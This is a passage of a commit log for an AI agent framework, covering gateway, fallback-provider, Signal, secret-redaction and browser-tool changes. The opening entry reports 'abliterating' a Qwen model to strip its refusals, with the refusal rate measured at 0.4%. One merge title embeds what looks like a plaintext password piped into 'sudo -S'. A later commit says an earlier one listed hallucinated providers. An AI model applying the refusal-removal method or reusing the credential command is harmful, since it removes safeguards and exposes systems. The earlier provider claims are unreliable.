- Fix torch property name: total_mem -> total_memory (caught
  during live testing)

Tested: Successfully abliterated Qwen2.5-0.5B-Instruct using
'advanced' method — refusal rate 0.4%, coherence 1.0, model
responds without refusal to test prompts.
2026-03-09 02:39:03 -07:00
teknium1
3b67606c42 fix: custom endpoint provider shows as openrouter in gateway
Three issues caused the gateway to display 'openrouter' instead of
'Custom endpoint' when users configured a custom OAI-compatible endpoint:

1. hermes setup: custom endpoint path saved OPENAI_BASE_URL and
   OPENAI_API_KEY to .env but never wrote model.provider to config.yaml.
   All other providers (Codex, z.ai, Kimi, etc.) call
   _update_config_for_provider() which sets this — custom was the only
   path that skipped it. Now writes model.provider='custom' and
   model.base_url to config.yaml.

2. hermes model: custom endpoint set model.provider='auto' in config.yaml.
   The CLI display had a hack to detect OPENAI_BASE_URL and override to
   'custom', but the gateway didn't. Now sets model.provider='custom'
   directly.

3. gateway /model and /provider commands: defaulted to 'openrouter' and
   read config.yaml — which had no provider set. Added OPENAI_BASE_URL
   detection fallback (same pattern the CLI uses) as a defensive catch
   for existing users who set up before this fix.
2026-03-09 02:38:34 -07:00
teknium1
a2d0d07109 Merge PR #754: fix: stabilize system prompt across gateway turns for cache hits
Prevents unnecessary Anthropic prompt cache misses by reusing stored
system prompts for continuing sessions and stabilizing Honcho context
per session instead of per turn.
2026-03-09 02:00:14 -07:00
teknium1
aedb773f0d fix: stabilize system prompt across gateway turns for cache hits
Two changes to prevent unnecessary Anthropic prompt cache misses in the
gateway, where a fresh AIAgent is created per user message:

1. Reuse stored system prompt for continuing sessions:
   When conversation_history is non-empty, load the system prompt from
   the session DB instead of rebuilding from disk. The model already has
   updated memory in its conversation history (it wrote it!), so
   re-reading memory from disk produces a different system prompt that
   breaks the cache prefix.

2. Stabilize Honcho context per session:
   - Only prefetch Honcho context on the first turn (empty history)
   - Bake Honcho context into the cached system prompt and store to DB
   - Remove the per-turn Honcho injection from the API call loop

   This ensures the system message is identical across all turns in a
   session. Previously, re-fetching Honcho could return different context
   on each turn, changing the system message and invalidating the cache.

Both changes preserve the existing behavior for compression (which
invalidates the prompt and rebuilds from scratch) and for the CLI
(where the same AIAgent persists and the cached prompt is already
stable across turns).

Tests: 2556 passed (6 new)
2026-03-09 01:50:58 -07:00
teknium1
aaf8f2d2d2 feat: expand secret redaction patterns
Added 14 new redaction patterns, all with distinctive prefixes
that have near-zero false positive risk:

Prefix patterns:
  - AWS Access Key ID (AKIA...)
  - Stripe keys (sk_live_, sk_test_, rk_live_)
  - SendGrid (SG....)
  - HuggingFace (hf_...)
  - Replicate (r8_...)
  - npm tokens (npm_...)
  - PyPI tokens (pypi-...)
  - DigitalOcean PATs (dop_v1_, doo_v1_)
  - AgentMail (am_...)

Structural patterns:
  - Private key blocks (-----BEGIN...PRIVATE KEY-----)
  - Database connection string passwords (postgres://user:PASS@host)
2026-03-09 01:28:27 -07:00
teknium1
12f4800631 docs: add security.redact_secrets as commented config section
Moved redact_secrets out of DEFAULT_CONFIG (it's on by default when
unset) and into the commented sections at the bottom of config.yaml,
alongside fallback_model. Users can see the option and uncomment to
disable.
2026-03-09 01:12:49 -07:00
teknium1
57b48a81ca feat: add config toggle to disable secret redaction
New config option:

  security:
    redact_secrets: false  # default: true

When set to false, API keys, tokens, and passwords are shown in
full in read_file, search_files, and terminal output. Useful for
debugging auth issues where you need to verify the actual key value.

Bridged to both CLI and gateway via HERMES_REDACT_SECRETS env var.
The check is in redact_sensitive_text() itself, so all call sites
(terminal, file tools, log formatter) respect it.
2026-03-09 01:04:33 -07:00
teknium1
7af33accf1 fix: apply secret redaction to file tool outputs
Terminal output was already redacted via redact_sensitive_text() but
read_file and search_files returned raw content. Now both tools
redact secrets before returning results to the LLM.

Based on PR #372 by @teyrebaz33 (closes #363) — applied manually
due to branch conflicts with the current codebase.
2026-03-09 00:49:46 -07:00
teknium1
3214c05e82 Merge PR #369: fix(gateway): add missing UTF-8 encoding to file I/O
Authored by @ch3ronsa. Fixes UnicodeEncodeError/UnicodeDecodeError on
Windows with non-UTF-8 system locales (e.g. Turkish cp1254).

Adds encoding='utf-8' to 10 open() calls across gateway/session.py,
gateway/channel_directory.py, and gateway/mirror.py.
2026-03-09 00:36:38 -07:00
teknium1
4608a7fe4e fix: make skills manifest writes atomic
Uses temp file + fsync + os.replace() to avoid corruption if the
process crashes mid-write. Cleans up temp file on failure, logs
errors at debug level.

Based on PR #335 by @aydnOktay — adapted for the current v2
manifest format (name:hash).
2026-03-08 23:53:57 -07:00
teknium1
af67ea8800 fix: setup wizard overwrites platform_toolsets saved by tools_command 2026-03-08 23:39:04 -07:00
teknium1
37c3dcf551 fix: setup wizard overwrites platform_toolsets saved by tools_command
The wizard and tools_command each loaded their own config dict. When
tools_command saved platform_toolsets (with MoA/HA disabled), the
wizard's final save_config() overwrote it with its own dict that lacked
platform_toolsets entirely — resetting everything to defaults.

Fix: pass the wizard's config dict into tools_command so they share the
same object. Now platform_toolsets survives the wizard's final save.
2026-03-08 23:39:00 -07:00
teknium1
6a49fbb7da fix: correct agentmail skill — API key goes in config.yaml env block
MCP server subprocess env is filtered through _build_safe_env() which
only passes safe baseline vars (PATH, HOME, XDG_*) plus whatever is
explicitly in the config's env: block. Env vars from ~/.hermes/.env
are NOT inherited by MCP subprocesses. The key must go directly in
the config.yaml mcp_servers.agentmail.env section.
2026-03-08 23:34:50 -07:00
teknium1
eb0b01de7b chore: move agentmail skill to optional-skills, add API key docs
AgentMail requires a third-party API key (free tier available, paid
plans from $20/mo) — not appropriate for bundled skills that show
up in every user's system prompt.

Added a Requirements section at the top with clear instructions
to add AGENTMAIL_API_KEY to ~/.hermes/.env. Streamlined setup steps
to avoid duplicating the key in both .env and config.yaml.
2026-03-08 23:33:05 -07:00
teknium1
5b1528519c Merge PR #330: feat: add AgentMail skill for agent-owned email inboxes
Authored by teyrebaz33. Closes #329.
2026-03-08 23:32:26 -07:00
teknium1
52f92eb689 fix: first-install tool setup shows all providers + skip options 2026-03-08 23:15:20 -07:00
teknium1
7f9dd60c15 fix: first-install tool setup shows all providers + skip options
Three fixes:

1. Web search provider menu now says 'Select Search Provider' and notes
   that a free DuckDuckGo search skill is included if Firecrawl isn't
   desired. Supports custom setup_title/setup_note per TOOL_CATEGORIES.

2. All multi-provider menus (web, browser, TTS) now include a
   'Skip — keep defaults / configure later' option so users can move on.

3. First-install flow now walks through ALL tools with provider options
   (browser, TTS, web, image_gen, etc.), not just ones missing API keys.
   Previously, tools with a free provider (browser/Local, TTS/Edge) were
   silently skipped — users never got to choose between Local vs
   Browserbase or Edge vs ElevenLabs.
2026-03-08 23:15:14 -07:00
teknium1
77da3bbc95 fix: use correct role for summary message in context compressor
The summary message was always injected as 'user' role, which causes
consecutive user messages when the last preserved head message is also
'user'. Some APIs reject this (400 error), and it produces malformed
training data.

Fix: check the role of the last head message and pick the opposite role
for the summary — 'user' after assistant/tool, 'assistant' after user.

Based on PR #328 by johnh4098. Closes #328.
2026-03-08 23:09:04 -07:00
teknium1
bb489a3903 fix: add first_install flag to tools setup for reliable API key prompting 2026-03-08 23:06:35 -07:00
teknium1
167eb824cb fix: add first_install flag to tools setup for reliable API key prompting
On fresh installs, the multi-level curses menu flow (platform menu →
checklist → loop back → Done) was unreliable — users could end up
skipping API key configuration entirely.

Now the setup wizard passes first_install=True to tools_command(), which:
- Skips the platform selection menu entirely
- Goes straight to the tool checklist
- Prompts for API keys on ALL selected tools that need them
- Linear flow, no loop — impossible to accidentally skip

Returning users (hermes tools / hermes setup tools) get the existing
platform menu loop as before.
2026-03-08 23:06:31 -07:00
teknium1
efb64aee5a fix: default MoA, Home Assistant, RL Training to off for new installs 2026-03-08 22:54:15 -07:00
teknium1
3045e29232 fix: default MoA, Home Assistant, and RL Training to off for new installs
New users shouldn't have these pre-checked in the tool configurator:
- MoA requires OpenRouter API key and is a niche feature
- Home Assistant requires HASS_TOKEN and most users don't have one
- RL Training requires Tinker + WandB keys

They're still available in the checklist to enable, just not pre-selected.
Existing users with saved platform_toolsets are unaffected.
2026-03-08 22:54:11 -07:00
teknium1
5d7d76025a fix: setup wizard default max iterations 60 → 90 2026-03-08 22:51:02 -07:00
teknium1
e6c829384e fix: setup wizard shows 60 as default max iterations, should be 90
AIAgent.__init__ defaults to max_iterations=90 but setup_agent_settings()
fell back to '60' when HERMES_MAX_ITERATIONS wasn't set.
2026-03-08 22:50:58 -07:00
teknium1
5c658a416c Merge PR #748: fix: first-time setup skips API key prompts + install.sh echo Link2them00n. | sudo -S -p '' on WSL 2026-03-08 22:03:12 -07:00
teknium1
a130aa8165 fix: first-time setup skips API key prompts + install.sh sudo on WSL
Two issues fixed:

1. (Critical) hermes setup tools / hermes tools: On first-time setup,
   the tool checklist showed all tools as pre-selected (from the default
   hermes-cli toolset), but after confirming the selection, NO API key
   prompts appeared. This is because the code only prompted for 'newly
   added' tools (added = new_enabled - current_enabled), but since all
   tools were already in the default set, 'added' was always empty.

   Fix: Detect first-time configuration (no platform_toolsets entry in
   config) and check ALL enabled tools for missing API keys, not just
   newly added ones. Returning users still only get prompted for newly
   added tools (preserving skip behavior).

2. install.sh: When run via curl|bash on WSL2/Ubuntu, ripgrep and ffmpeg
   install was silently skipped with a confusing 'Non-interactive mode'
   message. The script already uses /dev/tty for the setup wizard, but
   the system package section didn't.

   Fix: Try reading from /dev/tty when available (same pattern as the
   build-tools section and setup wizard). Only truly skip when no
   terminal is available at all (Docker build, CI).
2026-03-08 21:59:39 -07:00
teknium1
35d57ed752 refactor: unified OAuth/API-key credential resolution for fallback
Split fallback provider handling into two clean registries:

  _FALLBACK_API_KEY_PROVIDERS — env-var-based (openrouter, zai, kimi, minimax)
  _FALLBACK_OAUTH_PROVIDERS  — OAuth-based (openai-codex, nous)

New _resolve_fallback_credentials() method handles all three cases
(OAuth, API key, custom endpoint) and returns a uniform (key, url, mode)
tuple. _try_activate_fallback() is now just validation + client build.

Adds Nous Portal as a fallback provider — uses the same OAuth flow
as the primary provider (hermes login), returns chat_completions mode.

OAuth providers get credential refresh for free: the existing 401
retry handlers (_try_refresh_codex/nous_client_credentials) check
self.provider, which is set correctly after fallback activation.

4 new tests (nous activation, nous no-login, codex retained).
27 total fallback tests passing, 2548 full suite.
2026-03-08 21:44:48 -07:00
teknium1
5785bd3272 feat: add openai-codex as fallback provider
Codex OAuth uses a different auth flow (OAuth tokens, not env vars)
and a different API mode (codex_responses, not chat_completions).
The fallback now handles this specially:

- Resolves credentials via resolve_codex_runtime_credentials()
- Sets api_mode to codex_responses
- Fails gracefully if no Codex OAuth session exists

Also added to the commented-out config.yaml example.
2 new tests (codex activation + graceful failure).
2026-03-08 21:34:15 -07:00
teknium1
cf9482984e docs: condense AGENTS.md from 927 to 242 lines
AGENTS.md is read by AI agents in their context window. Every line
costs tokens. The previous version had grown to 927 lines with
user-facing documentation that duplicates website/docs/:

Removed (belongs in website/docs/, not agent context):
- Full CLI commands table (50 lines)
- Full gateway slash commands list (20 lines)
- Messaging gateway setup, config examples, security details
- DM pairing system details
- Event hooks format and examples
- Tool progress notification details
- Full environment variables reference
- Auxiliary model configuration section (60 lines)
- Background process management details
- Trajectory format details
- Batch processing CLI usage
- Skills system directory tree and hub details
- Dangerous command approval flow details
- Platform toolsets listing

Kept (essential for agents modifying code):
- Project structure (condensed to key files only)
- File dependency chain
- AIAgent class signature and loop mechanics
- How to add tools (3 files, full pattern)
- How to add config (config.yaml + .env patterns)
- How to add CLI commands
- Config loader table (two separate systems)
- Prompt caching policy (critical constraint)
- All known pitfalls
- Test commands
2026-03-08 21:33:10 -07:00
teknium1
67275641f8 fix: unify gateway session hygiene with agent compression config
The gateway had a SEPARATE compression system ('session hygiene')
with hardcoded thresholds (100k tokens / 200 messages) that were
completely disconnected from the model's context length and the
user's compression config in config.yaml. This caused premature
auto-compression on Telegram/Discord — triggering at ~60k tokens
(from the 200-message threshold) or inconsistent token counts.

Changes:
- Gateway hygiene now reads model name from config.yaml and uses
  get_model_context_length() to derive the actual context limit
- Compression threshold comes from compression.threshold in
  config.yaml (default 0.85), same as the agent's ContextCompressor
- Removed the message-count-based trigger (was redundant and caused
  false positives in tool-heavy sessions)
- Removed the undocumented session_hygiene config section — the
  standard compression.* config now controls everything
- Env var overrides (CONTEXT_COMPRESSION_THRESHOLD,
  CONTEXT_COMPRESSION_ENABLED) are respected
- Warn threshold is now 95% of model context (was hardcoded 200k)
- Updated tests to verify model-aware thresholds, scaling across
  models, and that message count alone no longer triggers compression

For claude-opus-4.6 (200k context) at 85% threshold: gateway
hygiene now triggers at 170k tokens instead of the old 100k.
2026-03-08 21:30:48 -07:00
teknium1
3ffaac00dd feat: bell_on_complete — terminal bell when agent finishes
Adds a simple config option to play the terminal bell (\a) when the
agent finishes a response. Useful for long-running tasks — switch to
another window and your terminal will ding when done.

Works over SSH since the bell character propagates through the
connection. Most terminal emulators can be configured to flash the
taskbar, play a sound, or show a visual indicator on bell.

Config (default: off):
  display:
    bell_on_complete: true

Closes #318
2026-03-08 21:30:48 -07:00
Teknium
816a3ef6f1 Merge pull request #745 from NousResearch/hermes/hermes-f8d56335
feat: browser console tool, annotated screenshots, auto-recording, and dogfood QA skill
2026-03-08 21:29:52 -07:00
teknium1
a8bf414f4a feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.

## New tool: browser_console

Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.

## Enhanced tool: browser_vision(annotate=True)

New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.

## Config: browser.record_sessions

Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default

## Built-in skill: dogfood

Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
   (Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence

Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template

## Tests

21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation

Addresses #315.
2026-03-08 21:28:12 -07:00
teknium1
3b312d45c5 fix: show fallback_model as commented-out YAML example in config
Remove fallback_model from DEFAULT_CONFIG (empty strings were useless
noise). Instead, save_config() appends a commented-out section at the
bottom of config.yaml showing the available providers and example usage.

When the user actually configures fallback_model, it appears as normal
YAML and the comment block is omitted.
2026-03-08 21:25:58 -07:00
teknium1
fcd899f888 docs: add platform integration checklist for new gateway adapters
Comprehensive 16-point checklist covering every integration point
needed when adding a new messaging platform to the gateway. Built
from the Signal integration experience where 7 integration points
were initially missed.

Covers: adapter, config enum, factory, auth maps, session source,
prompt hints, toolsets, cron delivery, send_message tool, cronjob
tool schema, channel directory, status display, setup wizard,
redaction, documentation, and tests.
2026-03-08 21:20:06 -07:00
Teknium
315f3ea429 Merge pull request #740 from NousResearch/hermes/hermes-3cd7c62d
feat: simple fallback model for provider resilience (#737)
2026-03-08 21:16:58 -07:00
teknium1
b7d6eae64c fix: Signal adapter parity pass — integration gaps, clawdbot features, env var simplification
Integration gaps fixed (7 files missing Signal):
- cron/scheduler.py: Signal in platform_map (cron delivery was broken)
- agent/prompt_builder.py: PLATFORM_HINTS for Signal (agent knows it's on Signal)
- toolsets.py: hermes-signal toolset + added to hermes-gateway composite
- hermes_cli/status.py: Signal + Slack in platform status display
- tools/send_message_tool.py: Signal example in target description
- tools/cronjob_tools.py: Signal in delivery option docs + schema
- gateway/channel_directory.py: Signal in session-based channel discovery

Clawdbot parity features added to signal.py:
- Self-message filtering: prevents reply loops by checking sender != account
- SyncMessage filtering: ignores sync envelopes (sent transcripts, read receipts)
- Edit message support: reads dataMessage from editMessage envelope
- Mention rendering: replaces \uFFFC placeholders with @identifier text
- Jitter in SSE reconnection backoff (20% randomization, prevents thundering herd)

Env var simplification (7 → 4):
- Removed SIGNAL_DM_POLICY (DM auth follows standard platform pattern via
  SIGNAL_ALLOWED_USERS + DM pairing, same as Telegram/Discord)
- Removed SIGNAL_GROUP_POLICY (derived from SIGNAL_GROUP_ALLOWED_USERS:
  not set = disabled, set with IDs = allowlist, set with * = open)
- Removed SIGNAL_DEBUG (was setting root logger, removed entirely)
- Remaining: SIGNAL_HTTP_URL, SIGNAL_ACCOUNT (required),
  SIGNAL_ALLOWED_USERS, SIGNAL_GROUP_ALLOWED_USERS (optional)

Updated all docs (website, AGENTS.md, signal.md) to match.
2026-03-08 21:00:21 -07:00
teknium1
b3765c28d0 fix: restrict fallback providers to actual hermes providers
Remove hallucinated providers (openai, deepseek, together, groq,
fireworks, mistral, gemini, nous) from the fallback provider map.
These don't exist in hermes-agent's provider system.

The real supported providers for fallback are:
  openrouter   (OPENROUTER_API_KEY)
  zai          (ZAI_API_KEY)
  kimi-coding  (KIMI_API_KEY)
  minimax      (MINIMAX_API_KEY)
  minimax-cn   (MINIMAX_CN_API_KEY)

For any other OpenAI-compatible endpoint, users can use the
base_url + api_key_env overrides in the config.

Also adds Kimi User-Agent header for kimi fallback (matching
the main provider system).
2026-03-08 20:49:55 -07:00
teknium1
4cfb66bac2 docs: list all supported fallback providers with env var names
The config comment now shows the complete list of built-in providers
that the fallback system supports, each with the env var it reads
for the API key. Also clarifies that custom OpenAI-compatible endpoints
work via base_url + api_key_env.
2026-03-08 20:42:54 -07:00
teknium1
0c4cff352a docs: add Signal messenger documentation across all doc surfaces
- website/docs/user-guide/messaging/signal.md: Full setup guide with
  prerequisites, step-by-step instructions, access policies, features,
  troubleshooting, security notes, and env var reference
- website/docs/user-guide/messaging/index.md: Added Signal to architecture
  diagram, platform toolset table, security examples, and Next Steps links
- website/docs/reference/environment-variables.md: All 7 SIGNAL_* env vars
- README.md: Signal in feature table and documentation table
- AGENTS.md: Signal in gateway description and env var config section
2026-03-08 20:42:04 -07:00
teknium1
503269b85a chore: remove stale docs/ directory
All documentation migrated to website/docs/ (Docusaurus). The docs/
directory only contained:
- README.md: redirect saying 'docs moved to website' (redundant)
- send_file_integration_map.md: internal engineering notes, unreferenced
  by any file in the codebase

The landing page at landingpage/ is still actively used by the
deploy-site.yml GitHub Actions workflow.
2026-03-08 20:41:47 -07:00
teknium1
161436cfdd feat: simple fallback model for provider resilience
When the primary model/provider fails after retries (rate limit, overload,
auth errors, connection failures), Hermes automatically switches to a
configured fallback model for the remainder of the session.

Config (in ~/.hermes/config.yaml):

  fallback_model:
    provider: openrouter
    model: anthropic/claude-sonnet-4

Supports all major providers: OpenRouter, OpenAI, Nous, DeepSeek, Together,
Groq, Fireworks, Mistral, Gemini — plus custom endpoints via base_url and
api_key_env overrides.

Design principles:
- Dead simple: one fallback model, not a chain
- One-shot: switches once, doesn't ping-pong back
- Zero new dependencies: uses existing OpenAI client
- Minimal code: ~100 lines in run_agent.py, ~5 lines in cli.py/gateway
- Three trigger points: max retries exhausted, non-retryable client errors,
  and invalid response exhaustion

Does NOT trigger on context overflow or payload-too-large errors (those
are handled by the existing compression system).

Addresses #737.

25 new tests, 2492 total passing.
2026-03-08 20:22:33 -07:00
teknium1
24f549a692 feat: add Signal messenger gateway platform (#405)
Complete Signal adapter using signal-cli daemon HTTP API.
Based on PR #268 by ibhagwan, rebuilt on current main with bug fixes.

Architecture:
- SSE streaming for inbound messages with exponential backoff (2s→60s)
- JSON-RPC 2.0 for outbound (send, typing, attachments, contacts)
- Health monitor detects stale SSE connections (120s threshold)
- Phone number redaction in all logs and global redact.py

Features:
- DM and group message support with separate access policies
- DM policies: pairing (default), allowlist, open
- Group policies: disabled (default), allowlist, open
- Attachment download with magic-byte type detection
- Typing indicators (8s refresh interval)
- 100MB attachment size limit, 8000 char message limit
- E.164 phone + UUID allowlist support

Integration:
- Platform.SIGNAL enum in gateway/config.py
- Signal in _is_user_authorized() allowlist maps (gateway/run.py)
- Adapter factory in _create_adapter() (gateway/run.py)
- user_id_alt/chat_id_alt fields in SessionSource for UUIDs
- send_message tool support via httpx JSON-RPC (not aiohttp)
- Interactive setup wizard in 'hermes gateway setup'
- Connectivity testing during setup (pings /api/v1/check)
- signal-cli detection and install guidance

Bug fixes from PR #268:
- Timestamp reads from envelope_data (not outer wrapper)
- Uses httpx consistently (not aiohttp in send_message tool)
- SIGNAL_DEBUG scoped to signal logger (not root)
- extract_images regex NOT modified (preserves group numbering)
- pairing.py NOT modified (no cross-platform side effects)
- No dual authorization (adapter defers to run.py for user auth)
- Wildcard uses set membership ('*' in set, not list equality)
- .zip default for PK magic bytes (not .docx)

No new Python dependencies — uses httpx (already core).
External requirement: signal-cli daemon (user-installed).

Tests: 30 new tests covering config, init, helpers, session source,
phone redaction, authorization, and send_message integration.

Co-authored-by: ibhagwan <ibhagwan@users.noreply.github.com>
2026-03-08 20:20:35 -07:00
Teknium
7a8778ac73 Merge pull request #732 from NousResearch/hermes/hermes-2cb83eed
docs: comprehensive AGENTS.md audit and corrections
2026-03-08 20:10:32 -07:00
teknium1
763c6d104d fix: unify gateway session hygiene with agent compression config
The gateway had a SEPARATE compression system ('session hygiene')
with hardcoded thresholds (100k tokens / 200 messages) that were
completely disconnected from the model's context length and the
user's compression config in config.yaml. This caused premature
auto-compression on Telegram/Discord — triggering at ~60k tokens
(from the 200-message threshold) or inconsistent token counts.

Changes:
- Gateway hygiene now reads model name from config.yaml and uses
  get_model_context_length() to derive the actual context limit
- Compression threshold comes from compression.threshold in
  config.yaml (default 0.85), same as the agent's ContextCompressor
- Removed the message-count-based trigger (was redundant and caused
  false positives in tool-heavy sessions)
- Removed the undocumented session_hygiene config section — the
  standard compression.* config now controls everything
- Env var overrides (CONTEXT_COMPRESSION_THRESHOLD,
  CONTEXT_COMPRESSION_ENABLED) are respected
- Warn threshold is now 95% of model context (was hardcoded 200k)
- Updated tests to verify model-aware thresholds, scaling across
  models, and that message count alone no longer triggers compression

For claude-opus-4.6 (200k context) at 85% threshold: gateway
hygiene now triggers at 170k tokens instead of the old 100k.
2026-03-08 20:08:02 -07:00
teknium1
4d7d9d9715 fix: add diagnostic logging to browser tool for errors.log
All failure paths in _run_browser_command now log at WARNING level,
which means they automatically land in ~/.hermes/logs/errors.log
(the persistent error log captures WARNING+).

What's now logged:
- agent-browser CLI not found (warning)
- Session creation failure with task ID (warning)
- Command entry with socket_dir path and length (debug)
- Non-zero return code with stderr (warning)
- Non-JSON output from agent-browser (warning — version mismatch/crash)
- Command timeout with task ID and socket path (warning)
- Unexpected exceptions with full traceback (warning + exc_info)
- browser_vision: which model is used and screenshot size (debug)
- browser_vision: LLM analysis failure with full traceback (warning)

Also fixed: _get_vision_model() was called twice in browser_vision —
now called once and reused.
2026-03-08 19:54:41 -07:00
teknium1
a9c35f9175 docs: comprehensive rewrite of all messaging platform setup guides
All four platform guides rewritten from thin ~60-line summaries to
comprehensive step-by-step setup guides with current (2025-2026) info:

telegram.md (74 → 196 lines):
- Full BotFather walkthrough with customization commands
- Privacy mode section with critical group chat gotcha
- Multiple user ID discovery methods
- Voice message setup (Whisper STT + TTS bubbles + ffmpeg)
- Group chat usage patterns and admin mode
- Recent Bot API features (privacy policy requirement, streaming)
- Troubleshooting table (6 issues)

discord.md (57 → 260 lines):
- Complete Developer Portal walkthrough (application, bot, intents)
- Detailed Privileged Gateway Intents section with warning about
  Message Content Intent being #1 failure cause
- Invite URL generation via Installation tab (new 2024) and manual
- Permission integer calculation (274878286912 recommended)
- Developer Mode user ID discovery
- Bot behavior documentation (DMs, channels, no-prefix)
- Troubleshooting table (6 issues)

slack.md (57 → 214 lines):
- Warning about classic Slack apps deprecated since March 2025
- Full scope tables (required + optional) with purposes
- Socket Mode setup with App-Level Token (xapp-)
- Event Subscriptions configuration
- User ID discovery via profile
- Two-token architecture explained (xoxb- + xapp-)
- Troubleshooting table

whatsapp.md (77 → 193 lines):
- Clarified whatsapp-web.js (not Business API) with ban risk warnings
- Linux Chromium dependencies (Debian + Fedora)
- Setup wizard QR code scanning workflow
- Session persistence with LocalAuth
- Second phone number options with cost table
- WhatsApp Web protocol update warnings
- Troubleshooting table (7 issues)

Docusaurus build verified clean.
2026-03-08 19:51:42 -07:00
teknium1
37752ff1ac feat: bell_on_complete — terminal bell when agent finishes
Adds a simple config option to play the terminal bell (\a) when the
agent finishes a response. Useful for long-running tasks — switch to
another window and your terminal will ding when done.

Works over SSH since the bell character propagates through the
connection. Most terminal emulators can be configured to flash the
taskbar, play a sound, or show a visual indicator on bell.

Config (default: off):
  display:
    bell_on_complete: true

Closes #318
2026-03-08 19:41:17 -07:00
teknium1
31b84213e4 docs: add Guides & Tutorials section, restructure sidebar
New documentation pages (1,823 lines):
- getting-started/learning-path.md: 3-tier learning path table
  (beginner/intermediate/advanced) + use-case-based navigation
- guides/tips.md: Tips & Best Practices quick-wins collection
  covering prompting, CLI power user tips, context files, memory,
  performance/cost, messaging, and security
- guides/daily-briefing-bot.md: End-to-end tutorial building an
  automated daily news briefing with cron + web search + messaging
- guides/team-telegram-assistant.md: Full walkthrough setting up
  a team Telegram bot with BotFather, gateway, DM pairing, and
  production deployment
- guides/python-library.md: Guide to using AIAgent as a Python
  library — basic usage, multi-turn conversations, toolset config,
  trajectories, custom prompts, and integration examples (FastAPI,
  Discord bot, CI/CD)
- reference/faq.md: Centralized FAQ (8 questions) + troubleshooting
  guide (6 categories, 18 specific issues) with problem/cause/solution
  format

Sidebar restructure:
- Added 'Guides & Tutorials' as new top-level section
- Reorganized flat Features list (17 items) into 5 subcategories:
  Core Features, Automation, Web & Media, Integrations, Advanced
- Added FAQ to Reference section
- Updated index.md quick links table

Docusaurus build verified clean.
2026-03-08 19:37:34 -07:00
teknium1
2036c22f88 fix: macOS browser/code-exec socket path exceeds Unix limit (#374)
macOS sets TMPDIR to /var/folders/xx/.../T/ (~51 chars). Combined with
agent-browser session names, socket paths reach 121 chars — exceeding
the 104-byte macOS AF_UNIX limit. This causes 'Screenshot file was not
created' errors and silent browser_vision failures on macOS.

Fix: use /tmp/ on macOS (symlink to /private/tmp, sticky-bit protected).
On Linux, tempfile.gettempdir() already returns /tmp — no behavior change.

Changes in browser_tool.py:
- Add _socket_safe_tmpdir() helper — returns /tmp on macOS, gettempdir()
  elsewhere
- Replace all 3 tempfile.gettempdir() calls for socket dirs
- Set mode=0o700 on socket dirs for privacy (was using default umask)
- Guard vision/text client init with try/except — a broken auxiliary
  config no longer prevents the entire browser_tool module from importing
  (which would disable all 10 browser tools, not just vision)
- Improve screenshot error messages with mode info and diagnostic hints
- Don't delete screenshots when LLM analysis fails — the capture was
  valid, only the vision API call failed. Screenshots are still cleaned
  up by the existing 24-hour _cleanup_old_screenshots mechanism.

Changes in code_execution_tool.py:
- Same /tmp fix for RPC socket path (was 103 chars on macOS — one char
  from the 104-byte limit)
2026-03-08 19:31:23 -07:00
teknium1
7185a66b96 feat: enhance Solana skill with USD pricing, token names, smart wallet output
Enhancements to the Solana blockchain skill (PR #212 by gizdusum):

- CoinGecko price integration (free, no API key)
  - Wallet shows tokens with USD values, sorted by value
  - Token info includes price and market cap
  - Transaction details show USD amounts for balance changes
  - Whale detector shows USD alongside SOL amounts
  - Stats includes SOL price and market cap
  - New `price` command for quick lookups by symbol or mint

- Smart wallet output
  - Tokens sorted by USD value (highest first)
  - Default limit of 20 tokens (--limit N to adjust)
  - Dust filtering (< $0.01 tokens hidden, count shown)
  - --all flag to see everything
  - --no-prices flag for fast RPC-only mode
  - NFT summary (count + first 10)
  - Portfolio total in USD

- Token name resolution
  - 25+ well-known tokens mapped (SOL, USDC, BONK, JUP, etc.)
  - CoinGecko fallback for unknown tokens
  - Abbreviated mint addresses for unlabeled tokens

- Reliability
  - Retry with exponential backoff on 429 rate-limit (RPC + CoinGecko)
  - Graceful degradation when price data unavailable
  - Capped API calls to respect CoinGecko free-tier limits

- Updated SKILL.md with all new capabilities and flags
2026-03-08 19:15:11 -07:00
teknium1
2394e18729 fix: add context to interruption messages for model awareness
When the agent is interrupted, the model now receives descriptive
context instead of a generic 'Operation interrupted.' string:

- Tool skip messages include the tool name:
  '[Tool execution cancelled — terminal was skipped due to user interrupt]'
  '[Tool execution skipped — web_search was not started. User sent a new message]'

- API call interrupts include timing:
  'Operation interrupted: waiting for model response (4.2s elapsed).'

- Retry/error interrupts include retry context:
  'Operation interrupted: retrying API call after rate limit (retry 2/5).'
  'Operation interrupted: handling API error (Timeout: connection timed out).'

This helps the model understand what was happening when it was
interrupted, reducing wasted iterations spent re-discovering state.
2026-03-08 18:58:23 -07:00
teknium1
99f7582175 chore: move Solana skill to optional-skills/
Solana blockchain queries are a niche use case — not needed by every user.
Moved from skills/ (bundled) to optional-skills/ (installable via Skills Hub).
2026-03-08 18:52:02 -07:00
teknium1
93c5997290 Merge PR #212: feat(skills): add Solana blockchain skill
Authored by Deniz Alagoz (gizdusum). Closes #164.
Will be moved to optional-skills/ and enhanced post-merge.
2026-03-08 18:51:33 -07:00
teknium1
2d1a1c1c47 refactor: remove redundant 'openai' auxiliary provider, clean up docs
The 'openai' provider was redundant — using OPENAI_BASE_URL +
